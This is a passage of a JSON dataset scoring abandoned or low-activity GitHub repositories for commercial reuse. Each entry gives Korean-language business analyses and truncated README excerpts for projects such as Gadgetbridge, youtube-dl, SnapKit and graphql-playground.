微信公众号 - [远程工作者](https://mp.weixin.qq.com/s/nueIQhSEONPzuTfw2PgJ2g)\n- 想要添加我的微信？[请看这里](https://github.com/greatghoul/remote-working/issues/340)\n\n## 📝 文章\n\n收集整理历年远程工作相关的经验文章\n\n**最近收录：**\n- [从“观望”到“投递”：我们应该如何拿下第一个远程兼职？](https://mp.weixin.qq.com/s/LqKlBJcG6Sa72KF3z7B72g)\n- [每个创业者都应该重新思考远程工作的真相](https://mp.weixin.qq.com/s/MIEFWmZkdQqcjZodS8HQbw)\n- [我对远程工作的理解](https://mp.weixin.qq.com/s/TC-tL40xXSSZL_nmCqBOZQ)\n- [远程办公：你赚了还是亏了？](https://mp.weixin.qq.com/s/6FQUmikPdNUge8vpszdjuA)\n- [远程办公的职业发展：如何在虚拟环境中晋升](https://mp.weixin.qq.com/s/hgqRaLtRa0h4HqJOH1z9RA)\n- [我其实并不看好远程办公](https://mp.weixin.qq.com/s/","composite_score":0.2379,"license_safety_tag":"safe"},{"name":"Freeyourgadget/Gadgetbridge","github_url":"https://github.com/Freeyourgadget/Gadgetbridge","stars":9,"language":"Java","license":"agpl-3.0","abandonment_months":17,"description":"# Gadgetbridge 상용화 분석\n\n## 왜 보물인가\n스마트워치, 피트니스 밴드 등 여러 웨어러블 기기를 하나의 앱으로 통합 관리할 수 있는 오픈소스 솔루션으로, 기기 제조사에 종속되지 않으려는 사용자들의 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웨어러블 기기 통합 관리 SaaS**\n- 개인 사용자가 여러 스마트기기의 건강 데이터(걸음 ","readme_excerpt":"Gadgetbridge is now hosted on [codeberg.org](https://codeberg.org/Freeyourgadget/Gadgetbridge/).\n\n<a href=\"https://codeberg.org/Freeyourgadget/Gadgetbridge/\">\n    <img alt=\"Get it on Codeberg\" src=\"https://get-it-on.codeberg.org/get-it-on-blue-on-white.png\" height=\"60\">\n</a>\n\nGadgetbridge\n============\n\nGadgetbridge is an Android (5.0+) application which will allow you to use your\nPebble, Mi Band, Amazfit Bip and HPlus device (and more) without the vendor's closed source application\nand without the need to create an account and transmit any of your data to the\nvendor's servers.\n\n[Homepage](https://gadgetbridge.org) - [Blog](https://blog.freeyourgadget.org) - <a rel=\"me\" href=\"https://social.anoxinon.de/@gadgetbridge\">Mastodon</a>\n\n[![Donate](https://liberapay.com/assets/widgets/donate.svg)](https://liberapay.com/Gadgetbridge/donate)\n\n\n[![Translate](https://hosted.weblate.org/widgets/freeyourgadget/-/gadgetbridge/svg-badge.svg)](https://hosted.weblate.org/projects/freeyourgadget/gadgetbr","composite_score":0.2368,"license_safety_tag":"risky"},{"name":"mamaral/Onboard","github_url":"https://github.com/mamaral/Onboard","stars":6,"language":"Objective-C","license":"mit","abandonment_months":17,"description":"# Onboard 저장소 분석\n\n## 왜 보물인가\n새로운 사용자들이 서비스를 쉽게 시작할 수 있도록 도와주는 안내 시스템으로, 고객 만족도를 높이는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 앱(노션, 슬랙 같은 협업 도구)에서 신규 가입자를 단계별로 가르치는 튜토리얼 제공\n- **내부 업무 도구**: 회사 직원 교육용","readme_excerpt":"# Onboard\n\n![Badge w/ Version](https://img.shields.io/cocoapods/v/Onboard.svg)\n[![CocoaPods](https://img.shields.io/cocoapods/dt/Onboard.svg?maxAge=3600)](https://cocoapods.org/pods/Onboard)\n[![Build Status](https://travis-ci.org/mamaral/Onboard.svg?branch=master)](https://travis-ci.org/mamaral/Onboard)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![License](http://img.shields.io/:license-mit-blue.svg)](http://doge.mit-license.org)\n\n![demo](Screenshots/city.gif)\n![demo](Screenshots/almanac.gif)\n![demo](Screenshots/solar.gif)\n![demo](Screenshots/tripnary.gif)\n\n# [Click Here For More Examples](examples.md)\n\nImportant\n=========\n\nOnboard is no longer under active development, and as such if you create any issues or submit pull requests, it's not very likely to be integrated. Thanks to all that helped make Onboard better over the last few years!\n\nUsage\n=====\n\nAdding the following to your `Podfile` and","composite_score":0.2365,"license_safety_tag":"safe"},{"name":"rg3/youtube-dl","github_url":"https://github.com/rg3/youtube-dl","stars":21,"language":"Python","license":"unlicense","abandonment_months":3,"description":"# youtube-dl 저장소 분석\n\n## 왜 보물인가\n유튜브와 수천 개의 동영상 사이트에서 영상을 자동으로 다운로드할 수 있는 도구로, 콘텐츠 보관, 오프라인 학습, 연구 자료 수집 등 다양한 합법적 용도에 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독자들이 웹사이트에서 영상을 선택하면 자동으로 다운로드해주는 '클라우","readme_excerpt":"[![Build Status](https://github.com/ytdl-org/youtube-dl/workflows/CI/badge.svg)](https://github.com/ytdl-org/youtube-dl/actions?query=workflow%3ACI)\n\n\nyoutube-dl - download videos from youtube.com or other video platforms\n\n- [INSTALLATION](#installation)\n- [DESCRIPTION](#description)\n- [OPTIONS](#options)\n- [CONFIGURATION](#configuration)\n- [OUTPUT TEMPLATE](#output-template)\n- [FORMAT SELECTION](#format-selection)\n- [VIDEO SELECTION](#video-selection)\n- [FAQ](#faq)\n- [DEVELOPER INSTRUCTIONS](#developer-instructions)\n- [EMBEDDING YOUTUBE-DL](#embedding-youtube-dl)\n- [BUGS](#bugs)\n- [COPYRIGHT](#copyright)\n\n# INSTALLATION\n\nTo install it right away for all UNIX users (Linux, macOS, etc.), type:\n\n    sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl\n    sudo chmod a+rx /usr/local/bin/youtube-dl\n\nIf you do not have curl, you can alternatively use a recent wget:\n\n    sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl\n  ","composite_score":0.2361,"license_safety_tag":"unknown"},{"name":"SnapKit/SnapKit","github_url":"https://github.com/SnapKit/SnapKit","stars":12,"language":"Swift","license":"mit","abandonment_months":13,"description":"# SnapKit 저장소 분석\n\n## 왜 보물인가\niPhone 앱을 만들 때 화면 배치를 쉽게 설계할 수 있는 도구로, 수천 개 앱 개발사가 실제로 사용하고 있는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 노코드 앱 빌더 플랫폼에 SnapKit 기술을 내장하여 사용자가 드래그앤드롭으로 앱을 만들 수 있게 제공\n2. **내","readme_excerpt":"<img src=\"https://snapkit.github.io/SnapKit/images/banner.jpg\" alt=\"\" />\n\nSnapKit is a DSL to make Auto Layout easy on both iOS and OS X.\n\n[![Build Status](https://travis-ci.org/SnapKit/SnapKit.svg)](https://travis-ci.org/SnapKit/SnapKit)\n[![Platform](https://img.shields.io/cocoapods/p/SnapKit.svg?style=flat)](https://github.com/SnapKit/SnapKit)\n[![Cocoapods Compatible](https://img.shields.io/cocoapods/v/SnapKit.svg)](https://cocoapods.org/pods/SnapKit)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\n#### ⚠️ **To use with Swift 4.x please ensure you are using >= 4.0.0** ⚠️\n#### ⚠️ **To use with Swift 5.x please ensure you are using >= 5.0.0** ⚠️\n\n## Contents\n\n- [Requirements](#requirements)\n- [Migration Guides](#migration-guides)\n- [Communication](#communication)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Credits](#credits)\n- [License](#license)\n\n## Requirements\n\n- iOS 12.0+ / Mac OS X 10.","composite_score":0.2361,"license_safety_tag":"safe"},{"name":"LearningInfiniTensor/learning-lm-rs","github_url":"https://github.com/LearningInfiniTensor/learning-lm-rs","stars":68,"language":"Rust","license":"NOASSERTION","abandonment_months":18,"description":"","readme_excerpt":"","composite_score":0.2357,"license_safety_tag":"unknown"},{"name":"IgorHalfeld/3d-sphere-vue","github_url":"https://github.com/IgorHalfeld/3d-sphere-vue","stars":25,"language":"JavaScript","license":"unknown","abandonment_months":19,"description":"","readme_excerpt":"## 3d Sphere Vue\n\n+ [Demo](https://3d-sphere-vue.surge.sh/)\n+ [Thread link](https://twitter.com/Rich_Harris/status/1200805237948325888)\n","composite_score":0.2353,"license_safety_tag":"unknown"},{"name":"facebook/php-webdriver","github_url":"https://github.com/facebook/php-webdriver","stars":5,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# facebook/php-webdriver 상용화 분석\n\n## 왜 보물인가\n페이스북이 만든 이 도구는 웹사이트를 자동으로 조작하고 테스트하는 기능을 제공하기 때문에, 반복적인 웹 작업을 사람이 직접 하지 않고도 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS - 웹 자동화 플랫폼**: 고객사의 웹 기반 업무(데이터 입력, 보고서 생성","readme_excerpt":"# php-webdriver – Selenium WebDriver bindings for PHP\n\n[![Latest stable version](https://img.shields.io/packagist/v/php-webdriver/webdriver.svg?style=flat-square&label=Packagist)](https://packagist.org/packages/php-webdriver/webdriver)\n[![GitHub Actions build status](https://img.shields.io/github/actions/workflow/status/php-webdriver/php-webdriver/tests.yaml?style=flat-square&label=GitHub%20Actions)](https://github.com/php-webdriver/php-webdriver/actions)\n[![SauceLabs test status](https://img.shields.io/github/actions/workflow/status/php-webdriver/php-webdriver/sauce-labs.yaml?style=flat-square&label=SauceLabs)](https://saucelabs.com/u/php-webdriver)\n[![Total downloads](https://img.shields.io/packagist/dd/php-webdriver/webdriver.svg?style=flat-square&label=Downloads)](https://packagist.org/packages/php-webdriver/webdriver)\n\n## Description\nPhp-webdriver library is PHP language binding for Selenium WebDriver, which allows you to control web browsers from PHP.\n\nThis library is compatible ","composite_score":0.2352,"license_safety_tag":"safe"},{"name":"fossasia/pslab-python","github_url":"https://github.com/fossasia/pslab-python","stars":11,"language":"Python","license":"GPL-3.0","abandonment_months":10,"description":"# PSLab Python 저장소 분석\n\n## 왜 보물인가\n과학 실험이나 전자기기 측정이 필요한 학교, 연구소, 메이커들이 저렴한 비용으로 전문 측정 도구를 사용할 수 있게 해주는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육용 SaaS 플랫폼**: 온라인 물리/화학 실험 교실에서 학생들이 집에서도 실험 기구를 제어하고 데이터를 수집할","readme_excerpt":"# PSLab Python Library\n\nThe Python library for the [Pocket Science Lab](https://pslab.io) from FOSSASIA.\n\n[![Build Status](https://github.com/fossasia/pslab-python/actions/workflows/workflow.yml/badge.svg)](https://github.com/fossasia/pslab-python/actions/workflows/workflow.yml)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/ce4af216571846308f66da4b7f26efc7)](https://www.codacy.com/app/mb/pslab-python?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/pslab&amp;utm_campaign=Badge_Grade)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThis repository hosts the Pytho","composite_score":0.235,"license_safety_tag":"restricted"},{"name":"hot3eed/frida-swift-bridge","github_url":"https://github.com/hot3eed/frida-swift-bridge","stars":28,"language":"TypeScript","license":"Apache-2.0","abandonment_months":12,"description":"# frida-swift-bridge 분석 보고서\n\n## 왜 보물인가\n아이폰 앱의 내부 동작을 안전하게 분석하고 테스트할 수 있는 개발자 전용 도구로, 보안 취약점 발견과 앱 품질 개선에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 보안 검사 SaaS**: 기업들이 자사 아이폰 앱의 보안 문제를 자동으로 찾아주는 클라우드 기반 검사 서비스","readme_excerpt":"# frida-swift-bridge\n\nSwift interop from Frida.\n\n## Requirements\n\n- arm64(e) Darwin platforms\n- Apps built using Swift 5.0+\n\n## Getting started\nThe bridge comes bundled with Frida as of v15.1.0. That means it's as simple as [installing Frida](https://frida.re/docs/installation/), then:\n```\n$ frida <process name>\n[Local::<process name>]-> Swift.available\ntrue\n```\nOr, preferably, since the bridge isn't at production capacity yet, it might be better to use the latest\nbridge from git, as there might be fixes or patches that haven't made it to the latest Frida version yet.\n```\n$ git clone git@github.com:frida/frida-swift-bridge.git\n$ cd frida-swift-bridge\n$ npm install\n$ npm run watch\n$ frida <process name> -l _agent.js # In another terminal\n```\n\n## Showcase\nThe best way to really see the available APIs in action is to have a look at the [testsuite](test/basics.c). And who doesn't like a good screenshot?\n![Screen Shot 2021-09-01 at 12 08 27 AM](https://user-images.githubusercontent.com/4832","composite_score":0.2349,"license_safety_tag":"safe"},{"name":"graphcool/graphql-playground","github_url":"https://github.com/graphcool/graphql-playground","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# GraphQL Playground 상용화 분석\n\n## 왜 보물인가\n개발자들이 웹 애플리케이션을 만들 때 필요한 데이터를 테스트하고 확인할 수 있는 도구로, 개발 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **API 판매 서비스**: 기술 기업들이 자신의 데이터 조회 서비스를 판매할 때 고객들이 직접 테스트할 수 있는 웹 기반 도구 제공","readme_excerpt":"# 2026-04: This repository is now archived and future GraphQL IDE developments will happen in [GraphiQL](https://github.com/graphql/graphiql/).\n \n\n--- \n\n<p align=\"center\"><img src=\"https://imgur.com/5fzMbyV.png\" width=\"269\"></p>\n\n[![npm version](https://badge.fury.io/js/graphql-playground-react.svg)](https://badge.fury.io/js/graphql-playground-react)\n[![graphql](https://circleci.com/gh/graphql/graphql-playground.svg?style=shield)](https://circleci.com/gh/graphql/graphql-playground)\n\n> **SECURITY WARNING:** both `graphql-playground-html` and [all four (4) of it's middleware dependents](#impacted-packages) until `graphql-playground-html@1.6.22` were subject to an  **XSS Reflection attack vulnerability only to unsanitized user input strings** to the functions therein. This was resolved in `graphql-playground-html@^1.6.22`. [More Information](#security-details) [CVE-2020-4038](https://github.com/graphql/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf)\n\n\n**Future of this reposito","composite_score":0.2348,"license_safety_tag":"safe"},{"name":"cep21/circuit","github_url":"https://github.com/cep21/circuit","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":3,"description":"# circuit 저장소 분석\n\n## 왜 보물인가\n회로도나 전자기기 설계 같은 복잡한 시스템을 컴퓨터가 자동으로 검증해주는 도구로, 설계 오류로 인한 비용 낭비를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **반도체/전자제품 개발사 내부 도구**: 엔지니어들이 회로 설계 후 자동으로 오류를 찾아내는 소프트웨어\n2. **전자기기 제조 컨설팅 서","readme_excerpt":"<!-- Image designed by Jack Lindamood, Licensed under the Creative Commons 3.0 Attributions license, originate from\nhttps://github.com/golang-samples/gopher-vector design by Takuya Ueda -->\n![Mascot](https://cep21.github.io/circuit/imgs/hystrix-gopher_100px.png)\n# Circuit\n[![Build Status](https://github.com/cep21/circuit/workflows/Test/badge.svg?branch=master&event=push)](https://github.com/cep21/circuit/actions)\n[![GoDoc](https://godoc.org/github.com/cep21/circuit?status.svg)](https://pkg.go.dev/github.com/cep21/circuit/v4)\n[![Coverage Status](https://coveralls.io/repos/github/cep21/circuit/badge.svg)](https://coveralls.io/github/cep21/circuit)\n\nCircuit is an efficient and feature complete [Hystrix](https://github.com/Netflix/Hystrix) like Go implementation of\nthe [circuit breaker pattern](https://docs.microsoft.com/en-us/azure/architecture/patterns/circuit-breaker).\nLearn more about the problems Hystrix and other circuit breakers solve on the\n[Hystrix Wiki](https://github.com/Netflix","composite_score":0.2345,"license_safety_tag":"safe"},{"name":"tebelorg/TagUI","github_url":"https://github.com/tebelorg/TagUI","stars":7,"language":"JavaScript","license":"apache-2.0","abandonment_months":19,"description":"# TagUI 저장소 분석\n\n## 왜 보물인가\n반복적인 업무를 자동으로 처리해주는 로봇처럼, 사람이 직접 하지 않아도 컴퓨터가 알아서 일을 진행할 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **업무 자동화 SaaS**: 중소 기업의 반복적인 데이터 입력, 이메일 처리, 보고서 작성 같은 일을 자동으로 처리해주는 월 구독 서비스\n2. **","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/tebelorg/TagUI/rpa_python/src/media/tebel_icon.png\" height=\"111\" align=\"right\">\n\n# TagUI\n\n[**Why This**](#why-this)&ensp;|&ensp;[**Set Up**](#set-up)&ensp;|&ensp;[**To Use**](#to-use)&ensp;|&ensp;[**Cheat Sheet**](#cheat-sheet)&ensp;|&ensp;[**Developers**](#developers-reference)&ensp;|&ensp;[**Credits**](#credits)&ensp;|&ensp;[**Video**](https://www.youtube.com/watch?v=hzE4tKlzzg4)\n\nTagUI is a command-line tool for digital process automation (RPA)\n\n- automate Chrome in visible / invisible mode\n- visual automation of websites and desktop\n- write in 20+ human languages & JavaScript\n- Chrome extension for recording web actions\n- Python & R integrations for machine learning\n\n# Why This\nThe goal of UI (user interface) automation is to reproduce cognitive interactions that you have with websites or your desktop, so that your computer can do it for you, base on your schedule or conditions. TagUI helps you rapidly automate repetitive or time-critical","composite_score":0.2342,"license_safety_tag":"safe"},{"name":"fossasia/pslab-android","github_url":"https://github.com/fossasia/pslab-android","stars":12,"language":"Dart","license":"Apache-2.0","abandonment_months":0,"description":"# PSLab Android 저장소 분석\n\n## 왜 보물인가\n스마트폰을 과학 실험 장비로 변신시켜주는 오픈소스 프로젝트로, 학교나 연구기관에서 비싼 장비 대신 저비용으로 물리·화학 실험을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 학교 교육용 과학 실험 플랫폼 구독 서비스 (센서 데이터 분석 기능 포함)\n2. **내부 업무 ","readme_excerpt":"# PSLab Android App\n\nRepository for the PSLab Android App for performing experiments with the [Pocket Science Lab](https://pslab.io) open-hardware platform.\n\n[![Build](https://github.com/fossasia/pslab-app/actions/workflows/pull-request.yml/badge.svg)](https://github.com/fossasia/pslab-app/actions/workflows/pull-request.yml)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n![GitHub repo size](https://img.shields.io/github/repo-size/fossasia/pslab-app)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n[![Translation status](https://hosted.weblate.org/widgets/fossasia/-/pslab-app/svg-badge.svg)](https://hosted.weblate.org/projects/fossasia/pslab-app/","composite_score":0.2341,"license_safety_tag":"safe"},{"name":"Atlas-Scientific/Ezo_I2c_lib","github_url":"https://github.com/Atlas-Scientific/Ezo_I2c_lib","stars":80,"language":"C++","license":"MIT","abandonment_months":3,"description":"# Atlas-Scientific/Ezo_I2c_lib 분석\n\n## 왜 보물인가\n물의 산성도, 염도, 온도 등을 측정하는 센서들을 쉽게 연결하고 제어할 수 있는 표준화된 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **수족관/양식장 관리 SaaS**: 물 상태를 자동으로 모니터링하고 문제 발생 시 알림을 주는 구독 서비스\n2. **정수기/정수 장비 제조사의","readme_excerpt":"# Ezo_I2c_lib\nLibrary for using Atlas Scientific EZO devices in I2C mode\n\n## Instructions\nTo use the library with Arduino, follow [this link](https://www.arduino.cc/en/Guide/Libraries).\n\nFor instructions on how to set up the devices in I2C mode, see [this instructable](https://www.instructables.com/id/UART-AND-I2C-MODE-SWITCHING-FOR-ATLAS-SCIENTIFIC-E/)\n\nSee our [instructables page](https://www.instructables.com/member/AtlasScientific/) to learn how to assemble the hardware for some of the examples\n\n## Documentation\n```C++\n//errors\nenum errors {SUCCESS, FAIL, NOT_READY, NO_DATA, NOT_READ_CMD};\n\n//constructors\nEzo_board(uint8_t address);\t //Takes I2C address of the device\nEzo_board(uint8_t address, const char* name); \n//Takes I2C address of the device\n//as well a name of your choice\nEzo_board(uint8_t address, TwoWire* wire); //Takes I2C address and TwoWire interface\nEzo_board(uint8_t address, const char* name, TwoWire* wire); //Takes all 3 parameters\n\nvoid send_cmd(const char* command);","composite_score":0.2338,"license_safety_tag":"safe"},{"name":"timbersoftware/SwiftUI-Introspect","github_url":"https://github.com/timbersoftware/SwiftUI-Introspect","stars":15,"language":"Swift","license":"MIT","abandonment_months":2,"description":"# SwiftUI-Introspect 분석\n\n## 왜 보물인가\nApple의 iPhone 앱 개발 도구에서 숨겨진 기능들을 쉽게 사용할 수 있게 해주는 개발자 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: iPhone 앱 개발 플랫폼에서 이 도구를 번들로 제공하여 개발자의 생산성을 높이고 월 구독료 청구\n2. **내부 업무 도구**:","readme_excerpt":"SwiftUI Introspect\n=================\n\n[![CI Status Badge](https://github.com/siteline/swiftui-introspect/actions/workflows/ci.yml/badge.svg)](https://github.com/siteline/swiftui-introspect/actions/workflows/ci.yml)\n[![Swift Version Compatibility Badge](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fsiteline%2Fswiftui-introspect%2Fbadge%3Ftype%3Dswift-versions)](https://swiftpackageindex.com/siteline/swiftui-introspect)\n[![Platform Compatibility Badge](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fsiteline%2Fswiftui-introspect%2Fbadge%3Ftype%3Dplatforms)](https://swiftpackageindex.com/siteline/swiftui-introspect)\n\nSwiftUI Introspect lets you access the underlying UIKit or AppKit view for a SwiftUI view.\n\n- [How it works](#how-it-works)\n- [Install](#install)\n    - [Swift Package Manager](#swift-package-manager)\n    - [CocoaPods](#cocoapods)\n- [View Types](#view-types)\n- [Examples](#examples)\n- [Gener","composite_score":0.2337,"license_safety_tag":"safe"},{"name":"WangNingkai/OLAINDEX","github_url":"https://github.com/WangNingkai/OLAINDEX","stars":5,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# OLAINDEX 프로젝트 분석\n\n## 왜 보물인가\n클라우드 저장소(OneDrive, Google Drive 등)를 웹사이트처럼 멋지게 정렬해서 보여주는 도구로, 파일 관리를 훨씬 쉽고 보기 좋게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업이 직원들의 파일을 체계적으로 공유·관리할 수 있는 클라우드 협업 플랫폼\n2. **내","readme_excerpt":"# OLAINDEX\n\n✨ Another OneDrive Directory Index\n\n[![Latest Stable Version](https://poser.pugx.org/wangningkai/olaindex/v/stable)](https://packagist.org/packages/wangningkai/olaindex)\n[![GitHub stars](https://img.shields.io/github/stars/WangNingkai/OLAINDEX.svg?style=flat-square)](https://github.com/WangNingkai/OLAINDEX/stargazers)\n[![GitHub license](https://img.shields.io/github/license/WangNingkai/OLAINDEX.svg?style=flat-square)](https://github.com/WangNingkai/OLAINDEX/blob/master/LICENSE)\n\n> **[中文说明](README_CN.md)**\n\n## Introduction\n\nOLAINDEX is a sleek OneDrive directory index application built on Laravel framework, powered by Microsoft Graph API. It supports multiple account types, various themes, and rich file preview capabilities.\n\n## Features\n\n- 📁 OneDrive directory indexing with clean UI\n- 👁️ Rich file preview (images, videos, audio, code, documents)\n- 🔐 Password-protected directories & hidden paths\n- 🔍 In-directory search (no API calls needed)\n- 🔗 Short URL sharing mode\n- 🚀 Res","composite_score":0.2334,"license_safety_tag":"safe"},{"name":"yetanotherco/aligned_layer","github_url":"https://github.com/yetanotherco/aligned_layer","stars":296,"language":"Rust","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.2333,"license_safety_tag":"safe"},{"name":"nanocurrency/raiblocks","github_url":"https://github.com/nanocurrency/raiblocks","stars":11,"language":"C++","license":"BSD-3-Clause","abandonment_months":0,"description":"# Nano(Raiblocks) 저장소 분석\n\n## 왜 보물인가\n매우 빠르고 수수료 없이 돈을 주고받을 수 있는 기술로, 기존 은행이나 결제 시스템의 문제점을 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 국제 송금 서비스 SaaS**\n해외 수익금을 실시간으로 국내로 받는 프리랜서 플랫폼을 만들 수 있습니다.\n\n**2. 소액 결제 API**\n게임 내 아","readme_excerpt":"<p style=\"text-align:center;\"><img src=\"/images/logo.svg\" width\"300px\" height=\"auto\" alt=\"Logo\"></p>\n\n\n\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/nanocurrency/nano-node)](https://github.com/nanocurrency/nano-node/releases/latest)\n[![GitHub tag (latest by date)](https://img.shields.io/github/v/tag/nanocurrency/nano-node?color=darkblue&label=beta)](https://github.com/nanocurrency/nano-node/tags)\n[![Nano CT Status](https://raw.githubusercontent.com/gr0vity-dev/nano-node-builder/main/status_latest.svg)](https://ct.bnano.info)\n[![Coverage Status](https://coveralls.io/repos/github/nanocurrency/nano-node/badge.svg?branch=develop)](https://coveralls.io/github/nanocurrency/nano-node?branch=develop)\n[![Discord](https://img.shields.io/badge/discord-join%20chat-orange.svg)](https://chat.nano.org)\n\n---\n\n### What is Nano?\n\nNano is a digital payment protocol designed to be accessible and lightweight, with a focus on removing inefficiencies present in other cryptocurr","composite_score":0.2332,"license_safety_tag":"safe"},{"name":"apache/incubator-doris","github_url":"https://github.com/apache/incubator-doris","stars":7,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Apache Doris 저장소 분석\n\n## 왜 보물인가\n대규모 데이터를 빠르게 분석하고 실시간으로 처리할 수 있는 오픈소스 데이터베이스로, 기업의 빅데이터 운영 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 분석 대시보드 SaaS로 고객사 데이터를 실시간 시각화하여 매월 구독료 수익화\n2. **내부 업무 도","readme_excerpt":"<!--\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements.  See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership.  The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License.  You may obtain a copy of the License at\n\n  http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied.  See the License for the\nspecific language governing permissions and limitations\nunder the License.\n-->\n\n## 🌍 Read this in other language\n\n[English](README.md) • [العربية](docs/ar-SA/README.md) • [বাংলা](docs/bn-BD/README.md) • [Deutsch](docs/de-DE/README.md) • [Español](docs/es-ES/README.md) • [فارسی](docs/fa-IR/README.md) • [Français](d","composite_score":0.2331,"license_safety_tag":"safe"},{"name":"xi-editor/druid","github_url":"https://github.com/xi-editor/druid","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"# xi-editor/druid 평가 분석\n\n## 왜 보물인가\n텍스트 편집기와 사용자 인터페이스를 만드는 기술로, 소프트웨어 개발사들이 자신의 도구를 더 빠르고 효율적으로 만들 수 있게 해주는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 문서 편집 도구(협업 노트앱, 마크다운 에디터 등)의 핵심 엔진으로 활용\n","readme_excerpt":"![druid banner](https://raw.githubusercontent.com/linebender/druid/screenshots/images/small_banner.png)\n\n## A data-first Rust-native UI toolkit.\n\n[![crates.io](https://img.shields.io/crates/v/druid)](https://crates.io/crates/druid)\n[![docs.rs](https://docs.rs/druid/badge.svg)](https://docs.rs/druid/)\n[![license](https://img.shields.io/crates/l/druid)](https://github.com/linebender/druid/blob/master/LICENSE)\n[![chat](https://img.shields.io/badge/zulip-join_chat-brightgreen.svg)](https://xi.zulipchat.com)\n\nDruid was an experimental Rust-native UI toolkit. Its main goal was to offer a\npolished user experience. There were many factors to this goal, including\nperformance, a rich palette of interactions (hence a widget library to support\nthem), and playing well with the native platform.\nSee the [goals section](#Goals) for more details.\n\nWe did periodic releases of Druid on crates.io. All changes were documented\nin [the changelog](https://github.com/linebender/druid/blob/master/CHANGELOG.md).","composite_score":0.233,"license_safety_tag":"safe"},{"name":"isagalaev/highlight.js","github_url":"https://github.com/isagalaev/highlight.js","stars":7,"language":"JavaScript","license":"bsd-3-clause","abandonment_months":7,"description":"# Highlight.js 상업화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 프로그래밍 코드를 읽기 좋게 표현해주는 기술로, 개발자 커뮤니티와 기술 문서 플랫폼에서 널리 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기술 문서 플랫폼 SaaS**\n- 개발자들이 코드 예제를 공유하는 서비스에 고급 코드 표현 기능을 추가 판매\n\n**2. 내부 코드 ","readme_excerpt":"# Highlight.js\n\n[![latest version](https://badgen.net/npm/v/highlight.js?label=latest)](https://www.npmjs.com/package/highlight.js)\n[![license](https://badgen.net/github/license/highlightjs/highlight.js?color=cyan)](https://github.com/highlightjs/highlight.js/blob/main/LICENSE)\n[![install size](https://badgen.net/packagephobia/install/highlight.js?label=npm+install)](https://packagephobia.now.sh/result?p=highlight.js)\n![minified](https://img.shields.io/github/size/highlightjs/cdn-release/build/highlight.min.js?label=minified)\n[![NPM downloads weekly](https://badgen.net/npm/dw/highlight.js?label=npm+downloads&color=purple)](https://www.npmjs.com/package/highlight.js)\n[![jsDelivr CDN 